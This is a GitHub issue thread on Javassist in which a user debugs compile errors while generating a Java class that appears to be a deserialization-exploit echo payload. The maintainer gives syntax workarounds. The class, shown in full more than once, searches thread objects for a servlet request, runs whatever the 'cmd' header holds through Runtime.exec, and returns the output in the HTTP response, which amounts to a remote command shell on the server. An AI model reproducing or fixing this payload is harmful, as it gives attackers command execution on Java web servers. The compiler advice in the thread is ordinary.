### ISSUE TITLE
javassist.CannotCompileException: [source error] ; is missing

### ISSUE THREAD

**Issue by SummerSec** [jboss-javassist/javassist#403]
I want to transform this class using Javassist

```

public class dfs {

    static java.util.HashSet<Object> h;
    static javax.servlet.http.HttpServletRequest r;
    static javax.servlet.http.HttpServletResponse p;

    public dfs(){
        r = null;
        p = null;
        h =new java.util.HashSet<Object>();
        F(Thread.currentThread(),0);
    }

    private static boolean i(Object obj){
        if(obj==null|| h.contains(obj)){
            return true;
        }

        h.add(obj);
        return false;
    }

    private static void p(Object o, int depth){
        if(depth > 52||(r !=null&& p !=null)){
            return;
        }
        if(!i(o)){
            if(r ==null&&javax.servlet.http.HttpServletRequest.class.isAssignableFrom(o.getClass())){
                r = (javax.servlet.http.HttpServletRequest)o;
                if(r.getHeader("cmd")==null) {
                    r = null;
                }else{
                    try {
                        p = (javax.servlet.http.HttpServletResponse) r.getClass().getMethod("getResponse").invoke(r);

                    } catch (Exception e) {
                        r = null;
                    }
                }

            }
            if(r !=null&& p !=null){
                try {

                    p.getWriter().println(new java.util.Scanner(Runtime.getRuntime().exec(r.getHeader("cmd")).getInputStream()).useDelimiter("\\A").next());
                    p.getWriter().flush();
                }catch (Exception e){
                }
                return;
            }

            F(o,depth+1);
        }
    }

    private static void F(Object start, int depth){

        Class n=start.getClass();
        do{
            for (java.lang.reflect.Field declaredField : n.getDeclaredFields()) {
                declaredField.setAccessible(true);
                Object o = null;
                try{
                    o = declaredField.get(start);

                    if(!o.getClass().isArray()){
                        p(o,depth);
                    }else{
                        for (Object q : (Object[]) o) {
                            p(q, depth);
                        }

                    }

                }catch (Exception e){
                }
            }

        }while(
                (n = n.getSuperclass())!=null
        );
    }
}

```
he transformation code is as follows

```
        CtClass clazz = pool.makeClass("com.xxx.x.Test" + System.nanoTime());
        if ((clazz.getDeclaredConstructors()).length != 0) {
            clazz.removeConstructor(clazz.getDeclaredConstructors()[0]);
        }
        clazz.addField(CtField.make("static java.util.HashSet/*<Object>*/ h;", clazz));
        clazz.addField(CtField.make("static javax.servlet.http.HttpServletRequest r;",clazz));
        clazz.addField(CtField.make("static javax.servlet.http.HttpServletResponse p;",clazz));

        clazz.addMethod(CtMethod.make("private static boolean i(Object obj){        if(obj==null|| h.contains(obj)){            return true;        }        h.add(obj);        return false;    }",clazz));
        clazz.addMethod(CtMethod.make("private static void F(Object start, int depth){        Class n=start.getClass();        do{            for (Field declaredField : n.getDeclaredFields()) {                declaredField.setAccessible(true);                Object o = null;                try{                    o = declaredField.get(start);                    if(!o.getClass().isArray()){                        p(o,depth);                    }else{                        for (Object q : (Object[]) o) {                            p(q, depth);                        }                    }                }catch (Exception e){                }            }        }while(                (n = n.getSuperclass())!=null        );    }",clazz));

        clazz.addMethod(CtMethod.make("private static void p(Object o, int depth){        if(depth > 52||(r !=null&& p !=null)){            return;        }        if(!i(o)){            if(r ==null&&javax.servlet.http.HttpServletRequest.class.isAssignableFrom(o.getClass())){                r = (javax.servlet.http.HttpServletRequest)o;                if(r.getHeader(\"cmd\")==null) {                    r = null;                }else{                    try {                        p = (javax.servlet.http.HttpServletResponse) r.getClass().getMethod(\"getResponse\",null).invoke(r,null);                    } catch (Exception e) {                        r = null;                    }                }            }            if(r !=null&& p !=null){                try {                    p.getWriter().println(new java.util.Scanner(Runtime.getRuntime().exec(r.getHeader(\"cmd\")).getInputStream()).useDelimiter(\"\\\\A\").next());                    p.getWriter().flush();                }catch (Exception e){                }                return;            }            F(o,depth+1);        }    }",clazz));
        clazz.addMethod(CtMethod.make("public dfs(){        r = null;        p = null;        h =new java.util.HashSet/*<Object>*/();        F(Thread.currentThread(),0);    }",clazz));


```

I encountered the error reported
```

Exception in thread "main" javassist.CannotCompileException: [source error] ; is missing
	at javassist.CtNewMethod.make(CtNewMethod.java:84)
	at javassist.CtNewMethod.make(CtNewMethod.java:50)
	at javassist.CtMethod.make(CtMethod.java:140)
	at com.summersec.attack.deser.echo.AllEcho.genPayload(AllEcho.java:25)
	at com.summersec.attack.deser.util.Gadgets.createTemplatesImpl(Gadgets.java:65)
	at com.summersec.attack.deser.util.Gadgets.createTemplatesImpl(Gadgets.java:57)
	at com.summersec.attack.deser.echo.AllEcho.main(AllEcho.java:36)
Caused by: compile error: ; is missing
	at javassist.compiler.Parser.parseDeclarators(Parser.java:643)
	at javassist.compiler.Parser.parseDeclarationOrExpression(Parser.java:600)
	at javassist.compiler.Parser.parseFor(Parser.java:380)
	at javassist.compiler.Parser.parseStatement(Parser.java:279)
	at javassist.compiler.Parser.parseBlock(Parser.java:307)
	at javassist.compiler.Parser.parseStatement(Parser.java:261)
	at javassist.compiler.Parser.parseDo(Parser.java:351)
	at javassist.compiler.Parser.parseStatement(Parser.java:277)
	at javassist.compiler.Parser.parseBlock(Parser.java:307)
	at javassist.compiler.Parser.parseMethod2(Parser.java:172)
	at javassist.compiler.Javac.compileMethod(Javac.java:156)
	at javassist.compiler.Javac.compile(Javac.java:102)
	at javassist.CtNewMethod.make(CtNewMethod.java:79)
	... 6 more

```

**Comment by SummerSec** [comment]
```
        clazz.addMethod(CtMethod.make("private static void F(Object start, int depth){        Class n=start.getClass();        do{            for (Field declaredField : n.getDeclaredFields()) {                declaredField.setAccessible(true);                Object o = null;                try{                    o = declaredField.get(start);                    if(!o.getClass().isArray()){                        p(o,depth);                    }else{                        for (Object q : (Object[]) o) {                            p(q, depth);                        }                    }                }catch (Exception e){                }            }        }while(                (n = n.getSuperclass())!=null        );    }",clazz));

```
This line of code reports an error

**Comment by chibash** [comment]
Because the syntax `for (<var> : <list>)` is not supported?

**Comment by SummerSec** [comment]
> Because the syntax `for (<var> : <list>)` is not supported?

yes,but i have another question， Recursive loops are also unsupported? Are recursive method calls to methods also unsupported? I'll give two examples

examle one
```
public void B(int i){
    for(;i<7;i++){
    B(i)
}
}
```
example two
![df2f5c0ccfa7075d78b7e52e301cd39](https://user-images.githubusercontent.com/47944478/145401374-4d0a0708-d323-490f-9fa5-f9d254a5e4aa.png)

**Comment by chibash** [comment]
The first example would not work because `B() ` has not been declared when the body of `B` is compiled.B
You must first add a `B` method with an empty body and then do `setBody()` to override its body.
As for the second example, it would work but you must first add `B()` and then `C()`.

**Comment by SummerSec** [comment]
> The first example would not work because has not been declared when the body of is compiled.B You must first add a method with an empty body and then do to override its body. As for the second example, it would work but you must first add and then .`B() ``B``B``setBody()``B()``C()`

Is it also possible if it is a depth-first algorithm? I started with a depth-first algorithm, is that possible? Call the f method and the p method in a loop.

**Comment by chibash** [comment]
Any example?

**Comment by SummerSec** [comment]
> Any example?

```
    private static void p(Object o, int depth){
        if(depth > 52||(r !=null&& p !=null)){
            return;
        }
        if(!i(o)){
            if(r ==null&&javax.servlet.http.HttpServletRequest.class.isAssignableFrom(o.getClass())){
                r = (javax.servlet.http.HttpServletRequest)o;
                if(r.getHeader("cmd")==null) {
                    r = null;
                }else{
                    try {
                        p = (javax.servlet.http.HttpServletResponse) r.getClass().getMethod("getResponse").invoke(r);

                    } catch (Exception e) {
                        r = null;
                    }
                }

            }
            if(r !=null&& p !=null){
                try {

                    p.getWriter().println(new java.util.Scanner(Runtime.getRuntime().exec(r.getHeader("cmd")).getInputStream()).useDelimiter("\\A").next());
                    p.getWriter().flush();
                }catch (Exception e){
                }
                return;
            }

            F(o,depth+1);
        }
    }

    private static void F(Object start, int depth){

        Class n=start.getClass();
        do{
            for (java.lang.reflect.Field declaredField : n.getDeclaredFields()) {
                declaredField.setAccessible(true);
                Object o = null;
                try{
                    o = declaredField.get(start);

                    if(!o.getClass().isArray()){
                        p(o,depth);
                    }else{
                        for (Object q : (Object[]) o) {
                            p(q, depth);
                        }

                    }

                }catch (Exception e){
                }
            }

        }while(
                (n = n.getSuperclass())!=null
        );
    }
```

**Comment by chibash** [comment]
Before adding the `p` method,
> You must first add the `F` method with an empty body and then do setBody() to override its body.

**Comment by SummerSec** [comment]
> method

for example codes?

**Comment by chibash** [comment]
Something like:
```
clazz.addMethod(CtMethod.make("private static void F(Object start, int depth){}");
clazz.getDecalredMethod("F").setBody("{ Class n=start.getClass(); ... }");
```

**Comment by SummerSec** [comment]
> Something like:
> 
> ```
> clazz.addMethod(CtMethod.make("private static void F(Object start, int depth){}");
> clazz.getDecalredMethod("F").setBody("{ Class n=start.getClass(); ... }");
> ```

ok, thanks

**Comment by SummerSec** [comment]
> Something like:
> 
> ```
> clazz.addMethod(CtMethod.make("private static void F(Object start, int depth){}");
> clazz.getDecalredMethod("F").setBody("{ Class n=start.getClass(); ... }");
> ```

I tested the method you mentioned and encountered the following error

```
Exception in thread "main" javassist.CannotCompileException: [source error] no such class: start
	at javassist.CtBehavior.setBody(CtBehavior.java:474)
	at javassist.CtBehavior.setBody(CtBehavior.java:440)
	at com.summersec.attack.deser.echo.AllEcho.genPayload(AllEcho.java:63)
	at com.summersec.attack.deser.util.Gadgets.createTemplatesImpl(Gadgets.java:65)
	at com.summersec.attack.deser.util.Gadgets.createTemplatesImpl(Gadgets.java:57)
	at com.summersec.attack.deser.echo.AllEcho.main(AllEcho.java:100)
Caused by: compile error: no such class: start
```
